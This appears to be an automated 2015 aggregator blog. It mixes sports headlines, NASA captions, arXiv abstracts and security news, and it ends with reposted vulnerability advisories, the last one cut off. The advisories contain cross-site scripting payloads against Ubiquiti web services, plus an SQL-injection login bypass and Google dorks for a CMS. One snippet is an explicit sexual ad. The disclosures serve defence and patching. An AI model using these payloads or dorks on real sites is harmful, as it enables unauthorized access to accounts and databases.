Latest YouTube Video

Saturday, August 22, 2015

Ravens: Lopsided loss against Eagles a \"complete breakdown in every phase of the game,\" writes Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Orioles Video: Baltimore squanders lead, loses for 3rd straight night to Twins 3-2; Henry Urrutia RBI double (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Eagles: QB Sam Bradford led 12-play, 84-yard TD drive in only possession vs. Ravens, completing 3-of-5 passes for 35 yds (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Porto, Sporting both held to draws in Portugal

LISBON, Portugal (AP) Benfica can open an early gap to its main title rivals after FC Porto and Sporting Lisbon were both held to draws in the Portuguese league on Saturday.

from FOX Sports Digital http://ift.tt/1EayIOK
via IFTTT

Frustration for Rooney, Man U; Bournemouth gets 1st EPL win

LONDON (AP) As Wayne Rooney went a 10th game without scoring for Manchester United, an English striker did manage to score a hat trick on Saturday: Callum Wilson of Bournemouth.

from FOX Sports Digital http://ift.tt/1fymFPr
via IFTTT

Espanyol beats Getafe 1-0, Sociedad draws 0-0 at Deportivo

BARCELONA, Spain (AP) Espanyol midfielder Salva Sevilla scored the first and only goal of the Spanish league season on Saturday to earn a 1-0 win over 10-man Getafe, while Real Sociedad and Deportivo La Coruna recorded the second 0-0 draw of the competition.

from FOX Sports Digital http://ift.tt/1U6W75D
via IFTTT

Roma held 1-1 at Verona on opening day of Serie A season

MILAN (AP) Roma was held to a 1-1 draw at Hellas Verona on the opening day of the Serie A season on Saturday.

from FOX Sports Digital http://ift.tt/1KCDL7v
via IFTTT

Frustration for Rooney's Man U; Bournemouth gets 1st EPL win

LONDON (AP) Beyond Wayne Rooney's Manchester United goal drought stretching to a 10th game and Tottenham's struggles, it was a landmark day for newcomer Bournemouth in the Premier League on Saturday.

from FOX Sports Digital http://ift.tt/1MF5sRn
via IFTTT

Wilson hat trick as Bournemouth edges West Ham 4-3

LONDON (AP) Callum Wilson scored a hat trick as Bournemouth got its first ever Premier League victory by edging West Ham 4-3 Saturday at Upton Park.

from FOX Sports Digital http://ift.tt/1hRwVUJ
via IFTTT

Sunderland draws with Swansea to grab 1st league point

SUNDERLAND, England (AP) Sunderland rallied to draw with Swansea 1-1 Saturday and grab its first Premier League point of the season.

from FOX Sports Digital http://ift.tt/1hRwWYQ
via IFTTT

Crystal Palace beats Aston Villa 2-1 in Premier League

LONDON (AP) New signing Bakary Sako scored in the 88th minute Saturday to give Crystal Palace a 2-1 win over Aston Villa in the Premier League.

from FOX Sports Digital http://ift.tt/1E9WjyO
via IFTTT

Lewandowski scores late winner for Bayern at Hoffenheim

BERLIN (AP) Robert Lewandowski struck a last-minute winner for Bayern Munich to beat Hoffenheim 2-1 in the Bundesliga on Saturday.

from FOX Sports Digital http://ift.tt/1U6HjUv
via IFTTT

Jordi Alba back from injury for Barcelona's league opener

BARCELONA, Spain (AP) Barcelona defender Jordi Alba has recovered from an injury in time for Sunday's Spanish league opener at Athletic Bilbao.

from FOX Sports Digital http://ift.tt/1MKcC8A
via IFTTT

Blatter gets cow, milks support at home charity event

ULRICHEN, Switzerland (AP) Sepp Blatter was given a cow but gave little away about FIFA business at his annual charity football tournament on Saturday.

from FOX Sports Digital http://ift.tt/1I2wgER
via IFTTT

Meet Linux's New Fastest File-System – Bcachefs

First announced over five years ago, ex-Google engineer Kent Overstreet is pleasured in announcing the general availability of a new open-source file-system for Linux, called the Bcache File System (or Bcachefs). Bcachefs is a Linux kernel block layer cache that aims at offering a speedier and more advanced way of storing data on servers. Bcachefs promises to provide the same


from The Hacker News http://ift.tt/1PGEnx9
via IFTTT

Kashima Antlers beats Montedio Yamagata 3-0

KASHIMA, Japan (AP) Kashima Antlers maintained control of the J-League second stage table on Saturday, comfortably overcoming last-placed Montedio Yamagata 3-0.

from FOX Sports Digital http://ift.tt/1NM5Yfj
via IFTTT

Wondr

Wondr - Start an anonymous chat session with your Twitter followers. Posted by Sean Percival, on Product Hunt.

from Google Alert - anonymous http://ift.tt/1NsnOqt
via IFTTT

Salzburg signs Austria midfielder Pehlivan on 1-year deal

SALZBURG, Austria (AP) Red Bull Salzburg says Austria midfielder Yasin Pehlivan has joined the club on a one-year deal, ending a four-season stint in Turkey.

from FOX Sports Digital http://ift.tt/1LqkDPM
via IFTTT

Ashley Madison Hackers (with another 300GB Dump) – Wait, Cheaters! We haven't Yet Done

Over a month ago, a group of hackers breached the popular cheater's dating service Ashley Madison and its parent company Avid Life Media, affecting tens of Millions site customers private life and also dump the website's source code onto the dark web. The hackers behind the Ashley Madison hack, who call themselves The Impact Team, leaked 10GB of its customers private data online on Tuesday


from The Hacker News http://ift.tt/1JbNymZ
via IFTTT

Anonymous X

Create Page. Recent; 2015; 2014; Founded. Anonymous X is on Facebook. To connect with Anonymous X, sign up for Facebook today. Sign UpLog In.

from Google Alert - anonymous http://ift.tt/1PFo6ZB
via IFTTT

Sprites from Space


An old Moon and the stars of Orion rose above the eastern horizon on August 10. The Moon's waning crescent was still bright enough to be overexposed in this snapshot taken from another large satellite of planet Earth, the International Space Station. A greenish airglow traces the atmosphere above the limb of the planet's night. Below, city lights and lightning flashes from thunderstorms appear over southern Mexico. The snapshot also captures the startling apparition of a rare form of upper atmospheric lightning, a large red sprite caught above a lightning flash at the far right. While the space station's orbital motion causes the city lights to blur and trail during the exposure, the extremely brief flash of the red sprite is sharp. Now known to be associated with thunderstorms, much remains a mystery about sprites including how they occur, their effect on the atmospheric global electric circuit, and if they are somehow related to other upper atmospheric lightning phenomena such as blue jets or terrestrial gamma flashes. via NASA http://ift.tt/1Kz3Lk4

Friday, August 21, 2015

Orioles Video: Darren O'Day gave up 3 runs in the 8th and Baltimore fell to the Twins, 4-3 (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Thorns announce sellout for Aug. 30 game

PORTLAND, Ore. (AP) The Portland Thorns of the National Women's Soccer League announced a sellout of their Aug. 30 match against the Washington Spirit at Providence Park.

from FOX Sports Digital http://ift.tt/1NrOTu4
via IFTTT

Doodlers Anonymous x Blik Clock Challenge Submission

Snippet of my Doodlers Anonymous x Blik Clock Challenge Submission! Voting is up now and all you have to do is sign up to be a Doodlers ...

from Google Alert - anonymous http://ift.tt/1Jb7X9G
via IFTTT

Orioles: Manager Buck Showalter says he's sticking with Miguel Gonzalez in the rotation; He has a 6.95 ERA in August (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Werder Bremen draws at Hertha Berlin to earn 1st point

BERLIN (AP) Nigeria striker Anthony Ujah struck for Werder Bremen to draw at Hertha Berlin 1-1 and claim its first point of the Bundesliga season on Friday.

from FOX Sports Digital http://ift.tt/1JqykvT
via IFTTT

10-man Sevilla draws with Malaga in Spanish league opener

MALAGA, Spain (AP) Sevilla managed to draw at Malaga 0-0 Friday despite losing Steven N'Zonzi in a mistake-filled opening match of the Spanish league season.

from FOX Sports Digital http://ift.tt/1JaQlL3
via IFTTT

PSG beats Montpellier 1-0 to maintain perfect start

MONTPELLIER, France (AP) Paris Saint-Germain eased to a 1-0 win Friday at Montpellier to maintain its 100 percent start to the French league as it seeks a fourth successive title.

from FOX Sports Digital http://ift.tt/1NKNvjg
via IFTTT

Barcelona loans Halilovic to Sporting Gijon

BARCELONA, Spain (AP) Barcelona has agreed to loan midfielder Alen Halilovic for a season to fellow Spanish league club Sporting Gijon.

from FOX Sports Digital http://ift.tt/1MINJdv
via IFTTT

U of Illinois seeks to dismiss soccer player's lawsuit

URBANA, Ill. (AP) The University of Illinois is asking a judge to dismiss a former soccer player's lawsuit alleging she was improperly cleared to play after a concussion.

from FOX Sports Digital http://ift.tt/1fw8ZV0
via IFTTT

Here's Top 10 Popular Programming Languages used on GitHub

Open Source is the Future of the computer science world! On Wednesday, the popular coding website GitHub shared a graph that gives a closer look at the popularity of different programming languages used on its code sharing website that lets anyone edit, store, and collaborate on software code. Since its launch in 2008, GitHub saw various programming languages picking up momentum, as


from The Hacker News http://ift.tt/1KA09hD
via IFTTT

Premier League says Liverpool winner should not have stood

LONDON (AP) The Premier League has taken the unusual step of publicly saying Liverpool's winning goal against Bournemouth on Monday should have been disallowed.

from FOX Sports Digital http://ift.tt/1JvoQ4k
via IFTTT

Brazilian Ferretti to be Mexico's interim soccer coach

MEXICO CITY (AP) Ricardo Ferretti of Brazil will take over as interim coach of Mexico's national soccer team.

from FOX Sports Digital http://ift.tt/1KzGlv4
via IFTTT

New Russia coach looks to veterans to save Euro 2016 bid

MOSCOW (AP) New Russia coach Leonid Slutsky is putting his trust in veteran players as he tries to save his team's hopes of reaching next year's European championship.

from FOX Sports Digital http://ift.tt/1EHo0du
via IFTTT

Anonymous

CHAMPAIGN, Ill. (AP) — Comcast Cable Communications has given a local politician from Freeport the identity of an Internet service subscriber ...

from Google Alert - anonymous http://ift.tt/1h05M17
via IFTTT

Atletico extends defender Godin's contract through 2019

MADRID (AP) Atletico Madrid says defender Diego Godin has agreed to add another year to his contract, tying him to the Spanish club until 2019.

from FOX Sports Digital http://ift.tt/1Lozg62
via IFTTT

Leverkusen's new signing Aranguiz out for months

LEVERKUSEN, Germany (AP) Bayer Leverkusen has lost latest signing Charles Aranguiz for months.

from FOX Sports Digital http://ift.tt/1JnYTBL
via IFTTT

Multiple Flaws Exposed in Pocket Add-on for Firefox

With providing easy accessibility, the battle is not won! Server-side Vulnerabilities have been reported by a security researcher in the popular Pocket add-on that comes attached with the Firefox browser. The security flaws could have allowed hackers to exfiltrate data from the company’s servers as well as populate reading lists with malicious links. <!-- adsense --> Pocket,


from The Hacker News http://ift.tt/1J9paCG
via IFTTT

Ashley Madison 2.0 — Hackers Leak 20GB Data Dump, Including CEO's Emails

The Impact Team – Wait, Cheaters! We haven't yet done. The group of hackers behind the breach of Ashley Madison, the popular cheater's dating service, have released a second, even much bigger 'cheat sheet' exposing sensitive materials that include sensitive corporate information. Two days ago, the hackers released nearly 10GB of its customers' personal data online, which included 36 million


from The Hacker News http://ift.tt/1J9nozg
via IFTTT

M27: Not a Comet


While hunting for comets in the skies above 18th century France, astronomer Charles Messier diligently kept a list of the things he encountered that were definitely not comets. This is number 27 on his now famous not-a-comet list. In fact, 21st century astronomers would identify it as a planetary nebula, but it's not a planet either, even though it may appear round and planet-like in a small telescope. Messier 27 (M27) is an excellent example of a gaseous emission nebula created as a sun-like star runs out of nuclear fuel in its core. The nebula forms as the star's outer layers are expelled into space, with a visible glow generated by atoms excited by the dying star's intense but invisible ultraviolet light. Known by the popular name of the Dumbbell Nebula, the beautifully symmetric interstellar gas cloud is over 2.5 light-years across and about 1,200 light-years away in the constellation Vulpecula. This impressive color composite highlights details within the well-studied central region and fainter, seldom imaged features in the nebula's outer halo. It incorporates broad and narrowband images recorded using filters sensitive to emission from sulfur, hydrogen and oxygen atoms. via NASA http://ift.tt/1Mz4ZQS

Orioles Video: Miguel Gonzalez ripped for 7 ER over 5 IP in 15-2 loss to Twins; Gerardo Parra, Caleb Joseph RBI singles (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Leonardo Santiago to join Newcastle in A-League

SYDNEY (AP) Former Feyenoord and Ajax midfielder Leonardo has agreed to join Newcastle in Australian football's A-League on a one-year contract.

from FOX Sports Digital http://ift.tt/1fu93EP
via IFTTT

Thursday, August 20, 2015

Visa flap may sink World Cup qualifying match for Guam

HAGATNA, Guam (AP) Visas for members of the Guam national soccer team to enter Iran have been delayed two weeks ahead of a qualifying match, leaving a Guam official to say political tensions between the U.S. and the Islamic republic shouldn't affect sports.

from FOX Sports Digital http://ift.tt/1JnaH7f
via IFTTT

Warehouse Layout Method Based on Ant Colony and Backtracking Algorithm. (arXiv:1508.04872v1 [cs.AI])

Warehouse is one of the important aspects of a company. Therefore, it is necessary to improve Warehouse Management System (WMS) to have a simple function that can determine the layout of the storage goods. In this paper we propose an improved warehouse layout method based on ant colony algorithm and backtracking algorithm. The method works on two steps. First, it generates a solutions parameter tree from backtracking algorithm. Then second, it deducts the solutions parameter by using a combination of ant colony algorithm and backtracking algorithm. This method was tested by measuring the time needed to build the tree and to fill up the space using two scenarios. The method needs 0.294 to 33.15 seconds to construct the tree and 3.23 seconds (best case) to 61.41 minutes (worst case) to fill up the warehouse. This method is proved to be an attractive alternative solution for warehouse layout system.



from cs.AI updates on arXiv.org http://ift.tt/1K9GxW0
via IFTTT

Efficient Computation of Exact IRV Margins. (arXiv:1508.04885v1 [cs.AI])

The margin of victory is easy to compute for many election schemes but difficult for Instant Runoff Voting (IRV). This is important because arguments about the correctness of an election outcome usually rely on the size of the electoral margin. For example, risk-limiting audits require a knowledge of the margin of victory in order to determine how much auditing is necessary. This paper presents a practical branch-and-bound algorithm for exact IRV margin computation that substantially improves on the current best-known approach. Although exponential in the worst case, our algorithm runs efficiently in practice on all the real examples we could find. We can efficiently discover exact margins on election instances that cannot be solved by the current state-of-the-art.



from cs.AI updates on arXiv.org http://ift.tt/1K9GxVZ
via IFTTT

Duration and Interval Hidden Markov Model for Sequential Data Analysis. (arXiv:1508.04928v1 [cs.AI])

Analysis of sequential event data has been recognized as one of the essential tools in data modeling and analysis field. In this paper, after the examination of its technical requirements and issues to model complex but practical situation, we propose a new sequential data model, dubbed Duration and Interval Hidden Markov Model (DI-HMM), that efficiently represents "state duration" and "state interval" of data events. This has significant implications to play an important role in representing practical time-series sequential data. This eventually provides an efficient and flexible sequential data retrieval. Numerical experiments on synthetic and real data demonstrate the efficiency and accuracy of the proposed DI-HMM.



from cs.AI updates on arXiv.org http://ift.tt/1K9GxVW
via IFTTT

Message Passing and Combinatorial Optimization. (arXiv:1508.05013v1 [cs.AI])

Graphical models use the intuitive and well-studied methods of graph theory to implicitly represent dependencies between variables in large systems. They can model the global behaviour of a complex system by specifying only local factors. This thesis studies inference in discrete graphical models from an algebraic perspective and the ways inference can be used to express and approximate NP-hard combinatorial problems.

We investigate the complexity and reducibility of various inference problems, in part by organizing them in an inference hierarchy. We then investigate tractable approximations for a subset of these problems using distributive law in the form of message passing. The quality of the resulting message passing procedure, called Belief Propagation (BP), depends on the influence of loops in the graphical model. We contribute to three classes of approximations that improve BP for loopy graphs A) loop correction techniques; B) survey propagation, another message passing technique that surpasses BP in some settings; and C) hybrid methods that interpolate between deterministic message passing and Markov Chain Monte Carlo inference.

We then review the existing message passing solutions and provide novel graphical models and inference techniques for combinatorial problems under three broad classes: A) constraint satisfaction problems such as satisfiability, coloring, packing, set / clique-cover and dominating / independent set and their optimization counterparts; B) clustering problems such as hierarchical clustering, K-median, K-clustering, K-center and modularity optimization; C) problems over permutations including assignment, graph morphisms and alignment, finding symmetries and traveling salesman problem. In many cases we show that message passing is able to find solutions that are either near optimal or favourably compare with today's state-of-the-art approaches.



from cs.AI updates on arXiv.org http://ift.tt/1U1WwX1
via IFTTT

FIFA, WCup sponsors talk in secret over corruption crisis

ZURICH (AP) FIFA has met with some World Cup sponsors in a meeting they demanded after a corruption crisis rocked football's governing body.

from FOX Sports Digital http://ift.tt/1JtJ3aK
via IFTTT

Location of anonymous method should be one token, not the whole body

The .Location of a lambda (or anonymous method) symbol should be a single token to improve diagnostics that refer to them. Here is an example of a ...

from Google Alert - anonymous http://ift.tt/1K9bA4g
via IFTTT

Lazio striker Klose out for 3 matches with thigh injury

ROME (AP) Lazio has confirmed that striker Miroslav Klose will be sidelined for at least three matches with a left thigh injury.

from FOX Sports Digital http://ift.tt/1J7DjQy
via IFTTT

Ravens Video: Joe Flacco on his expectations for the season - \"we have the talent to go out there and make it happen\" (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Can anyone overthrow Juventus at the top of Serie A?

MILAN (AP) Serie A has had a familiar look to it in the past two seasons, with Juventus winning the league title and Roma finishing second.

from FOX Sports Digital http://ift.tt/1hOzKpI
via IFTTT

Ravens: Security director Darren Sanders found not guilty of groping female stadium worker after a game last December (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

anonymous fun - w4m

like to meet up and fuck no questions asked? I'm your girl. love fucking and sucking a stranger's cock. i'll be ur good little girl and do anything you ask ...

from Google Alert - anonymous http://ift.tt/1NHStNJ
via IFTTT

Midfielder Marco Asensio set for season at Espanyol

MADRID (AP) Espanyol and Real Madrid have reached an agreement for the season-long loan of attacking midfielder Marco Asensio to the Catalan club.

from FOX Sports Digital http://ift.tt/1hsWKdK
via IFTTT

World Cup experience made Miami goalie Catalina Perez better

CORAL GABLES, Fla. (AP) Miami goalkeeper Catalina Perez held her ground against the best women's soccer team in the world this summer.

from FOX Sports Digital http://ift.tt/1E7dNvX
via IFTTT

Juventus signs Brazil defender Alex Sandro from Porto

TURIN, Italy (AP) Juventus has signed Brazil left back Alex Sandro from Porto for 26 million euros ($29 million).

from FOX Sports Digital http://ift.tt/1Ln2fY6
via IFTTT

Juventus keen to silence doubters after summer of change

MILAN (AP) Juventus kicked off last season in uncertain fashion after former AC Milan coach Massimiliano Allegri replaced the popular Antonio Conte, who had resigned.

from FOX Sports Digital http://ift.tt/1J7SHKw
via IFTTT

I have a new follower on Twitter


Megabyte



Following: 1095 - Followers: 986

August 20, 2015 at 11:18AM via Twitter http://twitter.com/megabyte101

Howard, Beasley called up to US team for September games

CHICAGO (AP) Goalkeeper Tim Howard is back with the U.S. national team.

from FOX Sports Digital http://ift.tt/1Jln7g8
via IFTTT

Juventus aims for record-equaling 5th straight Serie A title

MILAN (AP) Juventus kicks off the Serie A season in familiar fashion, as the favorite to lift a record-equaling fifth successive league title.

from FOX Sports Digital http://ift.tt/1J6Scmd
via IFTTT

World Cup soccer star Carli Lloyd has book deal

NEW YORK (AP) World Cup soccer star Carli Lloyd, whose three goals in the 2015 final led the U.S. to a 5-2 victory over Japan, has a book deal.

from FOX Sports Digital http://ift.tt/1K8hT88
via IFTTT

Barcelona looking vulnerable on eve of Spanish opener

BARCELONA, Spain (AP) For a team that won it all in spectacular fashion last season, Barcelona begins the Spanish league plagued by doubts few could have imagined three months ago.

from FOX Sports Digital http://ift.tt/1KxBw5n
via IFTTT

[FD] UBNT Bug Bounty #3 - Persistent Filename Vulnerability

Document Title: =============== UBNT Bug Bounty #3 - Persistent Filename Vulnerability References (Source): ==================== http://ift.tt/1P38bTG Video: http://ift.tt/1WeSApA Release Date: ============= 2015-08-11 Vulnerability Laboratory ID (VL-ID): ==================================== 1467 Common Vulnerability Scoring System: ==================================== 4.2 Product & Service Introduction: =============================== Ubiquiti Networks is an American technology company started in 2005. Based in San Jose, California they are a manufacturer of wireless products whose primary focus is on under-served and emerging markets. (Copy of the Homepage: http://ift.tt/1lWIuZL ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered an application-side input validation web vulnerability in the official Ubiquiti Networks Community online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-03-17: Researcher Notification & Coordination (Hadji Samir) 2015-03-18: Vendor Notification (Ubnt Security Team - Bug Bounty Program) 2015-04-12: Vendor Response/Feedback (Ubnt Security Team - Bug Bounty Program) 2015-07-09: Vendor Fix/Patch (Ubnt Developer Team) 2015-08-11: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Ubiquiti Network Product: Ubnt Community - Web Application (Online Service) 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ An application-side web vulnerability has been discovered in the official Ubiquiti Networks Community online service web-application. The vulnerability allows an remote attacker to inject own script code to the application-side of the affected application module. The web vulnerability is located in the `filename` value of the `gallery page album upload` module. Remote attackers are able to inject own files with malicious `filename` value in the `album upload` POST method request to compromise the ubnt web-application. Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious attack requests. The attack vector is located on the application-side of the ubnt service and the request method to inject is POST. The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.2. Exploitation of the application-side validation web vulnerability requires no user interaction and only a low privileged web-application user account. Successful exploitation of the security vulnerability results in the ubnt community web-application compromise. Request Method(s): [+] [POST] Vulnerable Module(s): [+] gallerypage (upload) Vulnerable Parameter(s): [+] filename (Album) Affected Module(s): [+] confirmationpage Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers with low privileged application user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open link http://ift.tt/1J7pks1 2. Click add images 3. Upload image with name ">.png 4. Click selact an album and save 5. Post comment 6. Click selete the comment you will redirect to http://ift.tt/1E6ShYc 7. Now you will see the alert with the document cookies context! PoC Video: http://ift.tt/1WeSApA Reference(s): http://ift.tt/1fZalrx http://ift.tt/1J7pks1 http://ift.tt/1E6ShYc Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the album add module. Restrict the input and encode the filename to prevent further script code injection attack that runs through the application-side. Disallow special chars and implement a secure exception to prevent the execution itself. Security Risk: ============== The security risk of the application-side album filename input validation web vulnerability is estimated as medium. (CVSS 4.2) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Hadji Samir [samir@evolution-sec.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™

Source: Gmail -> IFTTT-> Blogger

[FD] UBNT Bug Bounty #1 - Client Side Cross Site Scripting Vulnerability

Document Title: =============== UBNT Bug Bounty #1 - Client Side Cross Site Scripting Vulnerability References (Source): ==================== http://ift.tt/1DZOknX #52988 Release Date: ============= 2015-08-17 Vulnerability Laboratory ID (VL-ID): ==================================== 1465 Common Vulnerability Scoring System: ==================================== 2.8 Product & Service Introduction: =============================== Ubiquiti Networks is an American technology company started in 2005. Based in San Jose, California they are a manufacturer of wireless products whose primary focus is on under-served and emerging markets. (Copy of the Homepage: http://ift.tt/1lWIuZL ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a client-side cross site scripting web vulnerability in the official Ubnt online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-03-17: Researcher Notification & Coordination (Hadji Samir) 2015-03-18: Vendor Notification (Ubnt Security Team - Bug Bounty Program) 2015-04-03: Vendor Response/Feedback (Ubnt Security Team - Bug Bounty Program) 2015-07-24: Vendor Fix/Patch (Ubnt Developer Team) 2015-08-12: Bug Bounty Reward (Ubnt Security Team - Bug Bounty Program) 2015-08-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Ubiquiti Network Product: Ubnt Store - Web Application (Online-Service) 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A non persistent cross site scripting web vulnerability has been discovered in the official Cisco Newsroom online service web-application. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions data by client-side manipulated cross site requests. The vulnerability is located in the `bridgename` value of the http://ift.tt/1J7pkrY service module. The injection point of the issue is the vulnerable uploader.swf file. Remote attackers are able to inject own script codes to the vulnerable GET method request of the uploader.swf module. The attack vector of the vulnerability is located on the client-side of the ubnt store web-application. The request method to inject the script code to the client-side is `GET`. The execution of the script code occurs in the same swf files context. The security risk of the non-persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.8. Exploitation of the client-side cross site scripting web vulnerability requires low user interaction (click) and no privileged application user account. Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and non-persistent manipulation of affected or connected service modules. Request Method(s): [+] GET Vulnerable Service(s): [+] Ubnt Store - (http://ift.tt/1J7pkrY) Vulnerable Module(s): [+] uploader.swf Vulnerable Parameter(s): [+] bridgeName Proof of Concept (PoC): ======================= The remote cross site vulnerability in the swf file can be exploited by remote attackers without privileged application user account and with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Example string attack uploader.swf?bridgeName=1``]));}catch(s){alert('hadjisamir')}// PoC: Payload http://ift.tt/1E6ShYa``]));}catch(s){alert('hadjisamir')}//Hadji Samir Reference(s): http://store.ubnt.com/ in the (uploader.swf) http://store.ubnt.com/skin/adminhtml/default/default/media/uploader.swf? Solution - Fix & Patch: ======================= Encode the bridgeName value in the uploaded swf files to prevent client-side script code injection attacks or cross site scripting. Security Risk: ============== The security risk of the client-side cross site scripting web vulnerabilities in the swf file is estimated as medium. (CVSS 2.8) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Hadji Samir [samir@evolution-sec.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™

Source: Gmail -> IFTTT-> Blogger

[FD] WebSolutions India Design CMS - SQL Injection Vulnerability

Document Title: =============== WebSolutions India Design CMS - SQL Injection Vulnerability References (Source): ==================== http://ift.tt/1TVeUWO Release Date: ============= 2015-08-20 Vulnerability Laboratory ID (VL-ID): ==================================== 1577 Common Vulnerability Scoring System: ==================================== 8.7 Product & Service Introduction: =============================== Award winning website design and mobile application development company in India. Day by day, the number of devices, platforms, and browsers that need to work with your site grows. Responsive web design represents a fundamental shift in how we`ll build websites for the decade to come. With Responsive Design, your website`s layout is fluid. Regardless of whether the visitor is browsing on a desktop computer, tablet or smart phone, a responsive website will arrange its content seamlessly to fit the user`s device. (Copy of the Vendor Homepage: http://ift.tt/1J7pkrS ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a high severity remote sql injection web vulnerability in the WebSolutions India Design CMS 2015Q3. Vulnerability Disclosure Timeline: ================================== 2015-08-20: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== WebSolutions India Product: WebSolutions - Design Content Management System 2015 Q3 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A remote sql injection web vulnerability has been discovered in the WebSolutions India Design CMS 2015Q3. The vulnerability allows remote attackers to execute own sql commands to compromise the web-applicaation or database management system. The vulnerability is located in the `username` and `password` input field values of the `login` module. Remote attackers are able to execute own sql commands by manipulation of the GET method request with the vulnerable username and password parameter. The request method to inject the sql command is GET and the issue is located on the application-side of the online-service. The sql vulnerability allows an attacker to remotly gain unauthorized access to the account system of the content management system. The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.7. Exploitation of the remote sql injection web vulnerability requires no user interaction or privilege web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. Request Method(s): [+] GET Vulnerable Module(s): [+] Login Vulnerable Parameter(s): [+] username [+] password Proof of Concept (PoC): ======================= The remote sql injection web vulnerability can be exploited by remote attackers without privilege web-application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Google Dork(s): intext:Designed by: Web Design Company Amritsar intext:Designed by: Websolutions India Admin Page: http://ift.tt/1E6ShY8 PoC: Login (username & password) '=''or' and 1=1'- Security Risk: ============== The security risk of the remote sql injection web vulnerability in the content management system login is estimated as high. (CVSS 8.7) Credits & Authors: ================== wild.soldier(behrouz mansoori) - Danger Security Team SPT: Nima Danger , Mehran_FLash and all 